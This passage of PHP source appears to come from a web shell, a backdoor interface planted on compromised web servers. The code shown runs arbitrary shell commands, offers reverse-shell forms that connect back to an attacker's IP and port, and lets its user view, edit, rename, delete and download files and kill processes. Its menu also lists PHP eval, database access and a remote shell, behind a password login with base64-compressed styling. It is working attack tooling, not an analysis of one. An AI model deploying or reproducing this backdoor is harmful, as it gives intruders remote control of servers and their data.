1284.         $s_result .= "<div class=\"mybox\"><h2>Reverse shell ( bin )</h2>
1285.         <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
1286.         <table class=\"myboxtbl\">
1287.         <tr><td style=\"width:100px;\">Your IP</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rstarget3\" value=\"".$rstarget3."\" /></td></tr>
1288.         <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlportb3\" value=\"".$rsportb3."\" /></td></tr>
1289.         </table>
1290.         <input type=\"submit\" name=\"xback_bin\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1291.         &nbsp;&nbsp;<span id=\"rs1\">".$rspesanb."</span>
1292.         <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
1293.         </form>
1294.         </div>";
1295.         $s_result .= "<div class=\"mybox\"><h2>Reverse shell ( php )</h2>
1296.         <form action=\"" . $_SERVER['PHP_SELF'] . "?rs\" method=\"post\" />
1297.         <table class=\"myboxtbl\">
1298.         <tr><td style=\"width:100px;\">Your IP</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rstarget4\" value=\"".$rstarget4."\" /></td></tr>
1299.         <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlportb4\" value=\"".$rsportb4."\" /></td></tr>
1300.         </table>
1301.         <input type=\"submit\" name=\"xback_php\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
1302.         &nbsp;&nbsp;<span id=\"rs1\">".$rspesanb."</span>
1303.         <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
1304.         </form>
1305.         </div>";
1306.     } // view file
1307.     elseif(isset($_REQUEST['view'])){
1308.         $f = ss($_REQUEST['view']);
1309.         if(isset($fnew) && (trim($fnew)!="")) $f = $fnew;
1310.  
1311.         if(is_file($f)){
1312.             if(!$s_win && $s_posix){
1313.                 $name = posix_getpwuid(fileowner($f));
1314.                 $group = posix_getgrgid(filegroup($f));
1315.                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
1316.             }
1317.             else {
1318.                 $owner = $s_user;
1319.             }
1320.             $filn = basename($f);
1321.             $s_result .= "<table class=\"viewfile\" style=\"width:100%;\">
1322.             <tr><td style=\"width:140px;\">Filename</td><td><span id=\"".cs($filn)."_link\">".$f."</span>
1323.             <form action=\"" . $_SERVER['PHP_SELF'] . "?d=".$pwd."&amp;view=".$f."\" method=\"post\" id=\"".cs($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
1324.                 <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
1325.                 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
1326.                 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
1327.                 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
1328.                 onclick=\"tukar('".cs($filn)."_link','".cs($filn)."_form');\" />
1329.             </form>
1330.             </td></tr>
1331.             <tr><td>Size</td><td>".gs($f)."</td></tr>
1332.             <tr><td>Permission</td><td>".gp($f)."</td></tr>
1333.             <tr><td>Owner</td><td>".$owner."</td></tr>
1334.             <tr><td>Create time</td><td>".date("d-M-Y H:i",filectime($f))."</td></tr>
1335.             <tr><td>Last modified</td><td>".date("d-M-Y H:i",filemtime($f))."</td></tr>
1336.             <tr><td>Last accessed</td><td>".date("d-M-Y H:i",fileatime($f))."</td></tr>
1337.             <tr><td>Actions</td><td>
1338.             <a href=\"?d=".$pwd."&amp;edit=".$f."\">edit</a> |
1339.             <a href=\"javascript:tukar('".cs($filn)."_link','".cs($filn)."_form');\">rename</a> |
1340.             <a href=\"?d=".$pwd."&amp;delete=".$f."\">delete</a> |
1341.             <a href=\"?d=".$pwd."&amp;dl=".$f."\">download</a>&nbsp;(<a href=\"?d=".$pwd."&amp;dlgzip=$f\">gzip</a>)</td></tr>
1342.             <tr><td>View</td><td>
1343.             <a href=\"?d=".$pwd."&amp;view=".$f."&amp;type=text\">text</a> |
1344.             <a href=\"?d=".$pwd."&amp;view=".$f."&amp;type=code\">code</a> |
1345.             <a href=\"?d=".$pwd."&amp;view=".$f."&amp;type=image\">image</a></td></tr>
1346.             </table>
1347.             ";
1348.             $t = "";
1349.             $iinfo = getimagesize($f);
1350.             if(substr($filn,-3,3) == "php") $t = "code";
1351.             if(is_array($iinfo)) $t = 'image';
1352.  
1353.             if(isset($_REQUEST['type'])) $t = ss($_REQUEST['type']);
1354.  
1355.             if($t=="image"){
1356.                 $width = (int) $iinfo[0];
1357.                 $height = (int) $iinfo[1];
1358.                 $imginfo = "Image type = ( ".$iinfo['mime']." )<br />
1359.                     Image Size = <span class=\"gaul\">( </span>".$width." x ".$height."<span class=\"gaul\"> )</span><br />";
1360.                 if($width > 800){
1361.                     $width = 800;
1362.                     $imglink = "<p><a href=\"?d=".$pwd."&amp;img=".$filn."\" target=\"_blank\">
1363.                     <span class=\"gaul\">[ </span>view full size<span class=\"gaul\"> ]</span></a></p>";
1364.                 }
1365.                 else $imglink = "";
1366.  
1367.                 $s_result .= "<div class=\"viewfilecontent\" style=\"text-align:center;\">".$imglink."
1368.                     <img width=\"".$width."\" src=\"?d=".$pwd."&amp;img=".$filn."\" alt=\"\" style=\"margin:8px auto;padding:0;border:0;\" /></div>";
1369.  
1370.             }
1371.             elseif($t=="code"){
1372.                 $s_result .= "<div class=\"viewfilecontent\">";
1373.                 $file = wordwrap(file_get_contents($f),160,"\n",true);
1374.                 $buff = highlight_string($file,true);
1375.                 $old = array("0000BB","000000","FF8000","DD0000", "007700");
1376.                 $new = array("4C83AF","888888", "87DF45", "EEEEEE" , "FF8000");
1377.                 $buff = str_ireplace($old,$new, $buff);
1378.                 $s_result .= $buff;
1379.                 $s_result .=  "</div>";
1380.             }
1381.             else {
1382.                 $s_result .= "<div class=\"viewfilecontent\">";
1383.                 $s_result .=  nl2br(htmlentities(wordwrap(file_get_contents($f),160,"\n",true)));
1384.                 $s_result .=   "</div>";
1385.             }
1386.         }
1387.         elseif(is_dir($f)){
1388.             chdir($f);
1389.             $pwd = cp(getcwd());
1390.             $s_result .= showdir($pwd,$s_prompt,$s_win);
1391.         }
1392.  
1393.     } // edit file
1394.     elseif(isset($_REQUEST['edit'])){
1395.         $f = ss($_REQUEST['edit']);
1396.         $fc = "";
1397.         $fcs = "";
1398.  
1399.         if(is_file($f)) $fc = file_get_contents($f);
1400.         if(isset($_REQUEST['fcsubmit'])){
1401.             $fc = ssc($_REQUEST['fc']);
1402.             if($filez = fopen($f,"w")){
1403.                 $time = date("d-M-Y H:i",time());
1404.                 if(fwrite($filez,$fc)) $fcs = "file saved <span class=\"gaya\">@</span> ".$time;
1405.                 else $fcs = "failed to save";
1406.                 fclose($filez);
1407.             }
1408.             else $fcs = "permission denied";
1409.         }
1410.         $s_result .= "  <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\">
1411.                 <textarea id=\"fc\" name=\"fc\" class=\"evalcode\">".htmlspecialchars($fc)."</textarea>
1412.                 <p><input type=\"text\" class=\"inputz\" style=\"width:98%;\" name=\"edit\" value=\"".$f."\" /></p>
1413.                 <p><input type=\"submit\" name=\"fcsubmit\" class=\"inputzbut\" value=\"Save !\" style=\"width:120px;height:30px;\" />
1414.                 &nbsp;&nbsp;".$fcs."</p>
1415.                 <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
1416.                 </form>
1417.                             ";
1418.  
1419.     } // task manager
1420.     elseif(isset($_REQUEST['ps'])){
1421.         $s_result = "<table class=\"explore sortable\">";
1422.         if(!$s_win) $h = "ps -aux";
1423.         else $h = "tasklist /V /FO csv";
1424.         $wcount = 11;
1425.         $wexplode = " ";
1426.         if($s_win) $wexplode = "\",\"";
1427.  
1428.  
1429.         $res = exe($h);
1430.         if(trim($res)=='') $s_result .= "<p class=\"rs_result\">error: permission denied</p>";
1431.         else{
1432.             if(!$s_win) $res = preg_replace('#\ +#',' ',$res);
1433.  
1434.             $psarr = explode("\n",$res);
1435.             $fi = true;
1436.             $tblcount = 0;
1437.  
1438.             $check = explode($wexplode,$psarr[0]);
1439.             $wcount = count($check);
1440.  
1441.             foreach($psarr as $psa){
1442.                 if(trim($psa)!=''){
1443.                     if($fi){
1444.                         $fi = false;
1445.                         $psln = explode($wexplode,$psa,$wcount);
1446.                         $s_result .= "<tr><th>action</th>";
1447.                         foreach($psln as $p){
1448.                             $s_result .= "<th>".trim(trim(strtolower($p)),"\"")."</th>";
1449.                         }
1450.                         $s_result .= "</tr>";
1451.                     }
1452.                     else{
1453.                         $psln = explode($wexplode,$psa,$wcount);
1454.                         $s_result .= "<tr>";
1455.                         $tblcount = 0;
1456.                         foreach($psln as $p){
1457.                             if(trim($p)=="") $p = "&nbsp;";
1458.                             if($tblcount == 0){
1459.                                 $s_result .= "<td style=\"text-align:center;\"><a href=\"?ps&amp;d=".$pwd."&amp;pid=".trim(trim($psln[1]),"\"")."\">kill</a></td>
1460.                                         <td style=\"text-align:center;\">".trim(trim($p),"\"")."</td>";
1461.                                 $tblcount++;
1462.                             }
1463.                             else{
1464.                                 $tblcount++;
1465.                                 if($tblcount == count($psln)) $s_result .= "<td style=\"text-align:left;\">".trim(trim($p), "\"")."</td>";
1466.                                 else $s_result .= "<td style=\"text-align:center;\">".trim(trim($p), "\"")."</td>";
1467.                             }
1468.                         }
1469.                         $s_result .= "</tr>";
1470.                     }
1471.                 }
1472.             }
1473.             $s_result .= "</table>";
1474.         }
1475.     }
1476.     else{
1477.         if(isset($_REQUEST['cmd'])){
1478.             $cmd = ss($_REQUEST['cmd']);
1479.             if(strlen($cmd) > 0){
1480.                 if(preg_match('#^cd(\ )+(.*)$#',$cmd,$r)){
1481.                     $nd = trim($r[2]);
1482.                     if(is_dir($nd)){
1483.                         chdir($nd);
1484.                         $pwd = cp(getcwd());
1485.                         $s_result .= showdir($pwd,$s_prompt,$s_win);
1486.                     }
1487.                     elseif(is_dir($pwd.$nd)){
1488.                         chdir($pwd.$nd);
1489.                         $pwd = cp(getcwd());
1490.                         $s_result .= showdir($pwd,$s_prompt,$s_win);
1491.                     }
1492.                     else $s_result .= "<pre>".$nd." is not a directory"."</pre>";
1493.                 }
1494.                 else{
1495.                     $s_r = htmlspecialchars(exe($cmd));
1496.                     if($s_r != '') $s_result .= "<pre>".$s_r."</pre>";
1497.                     else $s_result .= showdir($pwd,$s_prompt,$s_win);
1498.                 }
1499.             }
1500.             else $s_result .= showdir($pwd,$s_prompt,$s_win);
1501.         }
1502.         else $s_result .= showdir($pwd,$s_prompt,$s_win);
1503.     }
1504.  
1505.  
1506.     // print useful info
1507.     $s_info  = "<table class=\"headtbl\"><tr><td>".$s_software."</td></tr>";
1508.     $s_info .= "<tr><td>".$s_system."</td></tr>";
1509.     if($s_id != "") $s_info .= "<tr><td>".$s_id."</td></tr>";
1510.     $s_info .= "<tr><td>server ip : ".$s_server_ip."<span class=\"gaya\"> | </span>your   ip : ".$s_my_ip."<span class=\"gaya\"> | </span>";
1511.     if($s_safemode) $s_info .= "safemode <span class=\"gaya\">ON</span>";
1512.     else $s_info .= "safemode <span class=\"gaya\">OFF</span>";
1513.     $s_info .= "<span class=\"gaya\"> | </span> Time @ Server : ".date("d M Y H:i:s",time());
1514.     $s_info .= "
1515.         </td></tr>
1516.         <tr><td style=\"text-align:left;\">
1517.             <table class=\"headtbls\"><tr>
1518.             <td>".trim($letters)."</td>
1519.             <td>
1520.             <span id=\"chpwd\">
1521.             &nbsp;<a href=\"javascript:tukar('chpwd','chpwdform')\">
1522.             <img height=\"16px\" width=\"16px\" src=\"" . $_SERVER['PHP_SELF'] . "?favicon\" alt=\"Change\" style=\"vertical-align:middle;margin:6px 0;border:0;\" />
1523.             &nbsp;&nbsp;</a>".swd($pwd)."</span>
1524.             <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\" style=\"margin:0;padding:0;\">
1525.             <span class=\"sembunyi\" id=\"chpwdform\">
1526.             &nbsp;<a href=\"javascript:tukar('chpwdform','chpwd');\">
1527.             <img height=\"16px\" width=\"16px\" src=\"" . $_SERVER['PHP_SELF'] . "?favicon\" alt=\"Change\" style=\"vertical-align:middle;margin:6px 0;border:0;\" />
1528.             </a>&nbsp;&nbsp;
1529.             <input type=\"hidden\" name=\"d\" class=\"inputz\" style=\"width:300px;\" value=\"".cp($pwd)."\" />
1530.             <input type=\"text\" name=\"view\" class=\"inputz\" style=\"width:300px;\" value=\"".$pwd."\" />
1531.             <input class=\"inputzbut\" type=\"submit\" name=\"submit\" value=\"view file / folder\" />
1532.             <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('chpwdform','chpwd');\" />
1533.             </form>
1534.             </span>
1535.             </td></tr>
1536.             </table>
1537.         </td></tr>
1538.         </table>";
1539. }
1540. // OK now... thats the <brain>,, here comes the <head>
1541. ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
1542.    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1543.  
1544. <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
1545.  
1546. <head>
1547. <title><?php echo $s_title; ?></title>
1548. <link rel="SHORTCUT ICON" href="<?php echo $_SERVER['PHP_SELF']."?favicon"; ?>" />
1549.  
1550. <style type="text/css"><?php echo gzinflate(base64_decode($style)); ?></style>
1551.  
1552. <script type="text/javascript" src="<?php echo $_SERVER['PHP_SELF']."?sorttable"; ?>"></script>
1553. <script type="text/javascript">
1554. function tukar(l,b){
1555.     if(document.getElementById(l)) document.getElementById(l).style.display = 'none';
1556.     if(document.getElementById(b)) document.getElementById(b).style.display = 'block';
1557.     if(document.getElementById(l + '_')) document.getElementById(l + '_').focus();
1558. }
1559. function init(){
1560.     <?php if(isset($_REQUEST['cmd'])) echo "if(document.getElementById('cmd')) document.getElementById('cmd').focus();"; ?>
1561. }
1562. function clickcmd(){
1563.     var buff = document.getElementById('cmd');
1564.     if(buff.value == '- shell command -') buff.value = '';
1565. }
1566. </script>
1567.  
1568. </head>
1569.  
1570. <body onLoad="init();">
1571. <table id="main"><tr><td><?php if($s_auth){ ?>
1572.     <div><table id="header"><tr><td style="width:80px;"><table><tr><td><h1><a href="?"><?php echo $s_name; ?></a></h1></td></tr><tr><td style="text-align:right;"><div class="ver"><?php echo $s_ver; ?></div></td></tr></table></td>
1573.     <td><div class="headinfo"><?php echo $s_info; ?></div></td></tr></table>
1574.     </div>
1575.     <div style="clear:both;"></div>
1576.     <div id="menu">
1577.         <table style="width:100%;"><tr>
1578.         <td><a href="?&d=<?php echo $pwd; ?>" title="Explorer"><div class="menumi">xpl</div></a></td>
1579.         <td><a href="?ps&d=<?php echo $pwd; ?>" title="Display process status"><div class="menumi">ps</div></a></td>
1580.         <td><a href="?eval&d=<?php echo $pwd; ?>" title="PHP eval function"><div class="menumi">eval</div></a></td>
1581.         <td><a href="?phpinfo&d=<?php echo $pwd; ?>" title="Information about current state of PHP"><div class="menumi">php</div></a></td>
1582.         <td><a href="?db&d=<?php echo $pwd; ?>" title="Connect to database"><div class="menumi">db</div></a></td>
1583.         <td><a href="?rs&d=<?php echo $pwd; ?>" title="Remote Shell"><div class="menumi">rs</div></a></td>
1584.         <td style="width:100%;padding:0 0 0 6px;">
1585.         <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"><span class="prompt"><?php echo $s_prompt; ?></span>
1586.         <input id="cmd" onclick="clickcmd();" class="inputz" type="text" name="cmd" style="width:70%;" value="<?php
1587. if(isset($_REQUEST['cmd'])) echo "";
1588. else echo "- shell command -";
1589. ?>" />
1590.         <noscript><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></noscript>
1591.         <input type="hidden" name="d" value="<?php echo $pwd; ?>" />
1592.         </form>
1593.         </td>
1594.         </tr>
1595.         </table>
1596.     </div>
1597.     <div id="content" id="box_shell">
1598.         <div id="result"><?php echo $s_result; ?></div>
1599.     </div><?php }
1600. else{ ?>
1601.     <div style="width:100%;text-align:center;">
1602.    
1603.     <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
1604.     <img src="?favicon" style="margin:2px;vertical-align:middle;" />
1605.     <?php echo $s_name; ?>&nbsp;<span class="gaya"><?php echo $s_ver; ?></span><input id="login" class="inputz" type="password" name="login" style="width:120px;" value="" />
1606.     <input class="inputzbut" type="submit" value="Go !" name="submitlogin" style="width:80px;" />
1607.     </form>
1608.     </div>
1609.  
1610. <?php
1611. }
1612. ?>
1613. </td></tr></table>
1614. <p class="footer">Jsell data fuction saleum&copy;<?php echo date("Y",time())." ".$s_name; ?></p>
1615. </body>
1616. </html>
1617.